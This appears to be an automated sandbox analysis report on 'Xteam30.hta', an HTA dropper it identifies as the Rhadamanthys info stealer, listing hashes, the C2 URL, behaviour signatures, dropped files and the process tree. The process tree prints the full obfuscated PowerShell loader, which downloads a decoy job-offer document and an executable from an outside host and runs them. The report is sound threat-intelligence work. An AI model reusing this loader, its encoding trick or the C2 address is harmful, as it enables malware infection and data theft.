Overview

overview

10

Static

static

1

Xteam30.hta

windows7-x64

8

Xteam30.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    139s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-11-2024 20:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Xteam30.hta

  • Size

    22KB

  • MD5

    e4d9fac46b74d05a7110d922393c53b5

  • SHA1

    58e4466d4db0e9dbeeba589e785c095da4be28b7

  • SHA256

    1965c93b0ffdb18abb184528e4f9b90a43586cfa8c08a7f5f5bcd8ad8f90a302

  • SHA512

    2859aa9dcce959e03ca99731ec74a04cc439fa9494a208677e1e471c702369ef72151f8d11dbc25c4001b9dc0d7b956c6526d324ea0c1336cdf6505e347cff54

  • SSDEEP

    384:AewZKDUSPiVrmsDe8OCuCLfiOEUgPge2uwb7Gw7D+fFU0:fwuKNACtfiOEUgPge2uwb7GoD+e0

Score
10/10
rhadamanthysdiscoveryexecutionpersistencestealer

Malware Config

Extracted

Family

rhadamanthys

C2

https://51.75.171.9:5151/9640d96bbead45f349f3ab9/Xteam30.api

Signatures

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

    stealerrhadamanthys
  • Rhadamanthys family
    rhadamanthys
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Start PowerShell.

    execution
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2624
      • C:\Windows\SysWOW64\openwith.exe
        "C:\Windows\system32\openwith.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4340
    • C:\Windows\SysWOW64\mshta.exe
      C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Xteam30.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      1⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4892
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function KvGmHPuFs($BcqxEK, $vyAKkT){[IO.File]::WriteAllBytes($BcqxEK, $vyAKkT)};function rfZIzUy($BcqxEK){if($BcqxEK.EndsWith((urRcG @(30019,30073,30081,30081))) -eq $True){Start-Process (urRcG @(30087,30090,30083,30073,30081,30081,30024,30023,30019,30074,30093,30074)) $BcqxEK}else{Start-Process $BcqxEK}};function KcAYN($lUPLD){$wxpeRK = New-Object (urRcG @(30051,30074,30089,30019,30060,30074,30071,30040,30081,30078,30074,30083,30089));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vyAKkT = $wxpeRK.DownloadData($lUPLD);return $vyAKkT};function urRcG($CxcNOM){$UaHeSgZ=29973;$GKoHyynK=$Null;foreach($rNwOIvboe in $CxcNOM){$GKoHyynK+=[char]($rNwOIvboe-$UaHeSgZ)};return $GKoHyynK};function bPsceQMIo(){$nXOFGcK = $env:APPDATA + '\';$zLOPnasH = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30047,30084,30078,30083,30005,30052,30090,30087,30005,30057,30074,30070,30082,30005,30070,30088,30005,30070,30005,30053,30070,30078,30073,30005,30038,30073,30091,30074,30087,30089,30078,30088,30078,30083,30076,30005,30056,30085,30074,30072,30078,30070,30081,30078,30088,30089,30019,30073,30084,30072,30093));$ZiEwaK = $nXOFGcK + 'Join Our Team as a Paid Advertising Specialist.docx';KvGmHPuFs $ZiEwaK $zLOPnasH;rfZIzUy $ZiEwaK;;$KVjfmFmM = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30061,30089,30074,30070,30082,30024,30021,30019,30074,30093,30074));$EfTHHfXB = $nXOFGcK + 'Xteam30.exe';KvGmHPuFs $EfTHHfXB $KVjfmFmM;rfZIzUy $EfTHHfXB;;;}bPsceQMIo;
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1352
        • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
          "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\Join Our Team as a Paid Advertising Specialist.docx" /o ""
          3⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious use of SetWindowsHookEx
          PID:1488
        • C:\Users\Admin\AppData\Roaming\Xteam30.exe
          "C:\Users\Admin\AppData\Roaming\Xteam30.exe"
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4620
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:936

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\TCDFCE4.tmp\gb.xsl
      Filesize

      262KB

      MD5

      51d32ee5bc7ab811041f799652d26e04

      SHA1

      412193006aa3ef19e0a57e16acf86b830993024a

      SHA256

      6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

      SHA512

      5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yu5ixgyf.5in.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Join Our Team as a Paid Advertising Specialist.docx
      Filesize

      90KB

      MD5

      65d4be8afc700f773c79a0d89da13ec5

      SHA1

      f1bc5b54ee151155e8a85ca61ff1bea7295ee38d

      SHA256

      2189f8a864e30bf54fc7003c5d63ebfa143c6a07eca060638d30b0a473a97988

      SHA512

      25244cb6e322c39e7ef8bc1216280730be3927935a315174c1a75110257893f0d6ef41083e5409397396d8974c2fd2caf7003a20ff91de5c6462394d992e3a87

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
      Filesize

      379B

      MD5

      dcc5539b043d7681daaea721f9cc47ab

      SHA1

      f4a3c4d72ab342e70a28636ef43b986019a3eff0

      SHA256

      e4f6263f8a8ccfba449dcac191c33905d7eab17d70b615eb4bf030b2d49f0193

      SHA512

      b4b74954cb0e136c9c6e4f9e89d1d7d86a38351c3499a246a3087882fd3d52b6eee137a8ef2bdc0b75391cda4ff4ebe0422e2c6a8a6cbbfdfc760e1f37750fa5

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
      Filesize

      672B

      MD5

      3c33ca687681ba2d1edf5d32d8e22ab0

      SHA1

      8a50ef40497d260c5a84c7d0c10242d4cd0b5509

      SHA256

      141748f7ddcd1d6083a041ca770cf9ae3bb4d087cd7033f211b73026e63ad3c9

      SHA512

      6919d059d8e20f6ee86ad60643f3bc3d6733728839e5c35636359bb724f2d75f13af3bdb17382dc9f7186560f22cbd2abe761eba55e4e4bbfd5d24e11cd360a2

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
      Filesize

      1KB

      MD5

      d70104b60aaaac0754ccee12bc609da8

      SHA1

      90ab1ed393002c29ba825450709f27324460cfc2

      SHA256

      09c64f765129dbbe0562a3df514a34c4c2ce363f0fb31e4e51e7572f45e7ce7b

      SHA512

      72c7c65e24e310b74b723a45662629c92532b12ccaede11c63730bc528ea414e31e42e71ac1378b0d3a3f485880b320a6eff188f3bc48518a37ce7701b29246f

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Xteam30.exe
      Filesize

      2.6MB

      MD5

      421700a2d6d8516013d87e04628d2802

      SHA1

      f738ae62f1016c0667115665c42e71d85cfb4d38

      SHA256

      cc00a259ec4ebde015fe0fad59f369ae23def081caa787ad0652f7d6b2fe6de0

      SHA512

      c411036515d4046ba62370c2f27e32d414273dc2e4004b9c4396c3518f951ef97c717ab532dd52100f2950e137249462495b376b8d89adde4c3f89292e9f70e6

      Download Submit

    • memory/936-189-0x0000000000AE0000-0x0000000000AF0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/936-188-0x0000000000AD0000-0x0000000000AD8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/936-151-0x0000000004F40000-0x0000000004FD2000-memory.dmp

      Filesize

      584KB

      Download

    • memory/936-148-0x00000000000D0000-0x0000000000180000-memory.dmp

      Filesize

      704KB

      Download

    • memory/936-190-0x00000000054A0000-0x00000000058A0000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/936-191-0x00000000054A0000-0x00000000058A0000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/936-192-0x00007FFBB2010000-0x00007FFBB2205000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/936-194-0x0000000076600000-0x0000000076815000-memory.dmp

      Filesize

      2.1MB

      Download

    • memory/1352-20-0x0000000006A70000-0x0000000006A8A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/1352-16-0x0000000005F10000-0x0000000006264000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/1352-1-0x0000000002BA0000-0x0000000002BD6000-memory.dmp

      Filesize

      216KB

      Download

    • memory/1352-2-0x0000000072040000-0x00000000727F0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/1352-3-0x00000000056E0000-0x0000000005D08000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/1352-4-0x0000000005610000-0x0000000005632000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1352-5-0x0000000005D80000-0x0000000005DE6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/1352-6-0x0000000005EA0000-0x0000000005F06000-memory.dmp

      Filesize

      408KB

      Download

    • memory/1352-24-0x0000000008940000-0x0000000008EE4000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/1352-23-0x00000000079C0000-0x00000000079E2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1352-67-0x000000007204E000-0x000000007204F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1352-68-0x0000000072040000-0x00000000727F0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/1352-22-0x0000000007A30000-0x0000000007AC6000-memory.dmp

      Filesize

      600KB

      Download

    • memory/1352-82-0x0000000072040000-0x00000000727F0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/1352-0-0x000000007204E000-0x000000007204F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1352-19-0x0000000007D10000-0x000000000838A000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/1352-17-0x00000000064D0000-0x00000000064EE000-memory.dmp

      Filesize

      120KB

      Download

    • memory/1352-18-0x0000000006500000-0x000000000654C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/1488-28-0x00007FFB72090000-0x00007FFB720A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1488-31-0x00007FFB72090000-0x00007FFB720A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1488-33-0x00007FFB6FB60000-0x00007FFB6FB70000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1488-32-0x00007FFB72090000-0x00007FFB720A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1488-34-0x00007FFB6FB60000-0x00007FFB6FB70000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1488-30-0x00007FFB72090000-0x00007FFB720A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1488-29-0x00007FFB72090000-0x00007FFB720A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4340-210-0x0000000076600000-0x0000000076815000-memory.dmp

      Filesize

      2.1MB

      Download

    • memory/4340-202-0x00007FFBB2010000-0x00007FFBB2205000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/4340-198-0x0000000002D20000-0x0000000003120000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/4340-195-0x0000000001100000-0x0000000001109000-memory.dmp

      Filesize

      36KB

      Download

    • memory/4620-149-0x0000000000400000-0x0000000000887000-memory.dmp

      Filesize

      4.5MB

      Download

    • memory/4620-147-0x0000000000400000-0x0000000000887000-memory.dmp

      Filesize

      4.5MB

      Download

    • memory/4620-144-0x0000000000400000-0x0000000000887000-memory.dmp

      Filesize

      4.5MB

      Download

    • memory/4620-146-0x0000000000400000-0x0000000000887000-memory.dmp

      Filesize

      4.5MB

      Download

    • memory/4620-98-0x0000000000400000-0x0000000000887000-memory.dmp

      Filesize

      4.5MB

      Download

    • memory/4620-145-0x0000000000400000-0x0000000000887000-memory.dmp

      Filesize

      4.5MB

      Download

    • memory/4620-150-0x0000000000400000-0x0000000000887000-memory.dmp

      Filesize

      4.5MB

      Download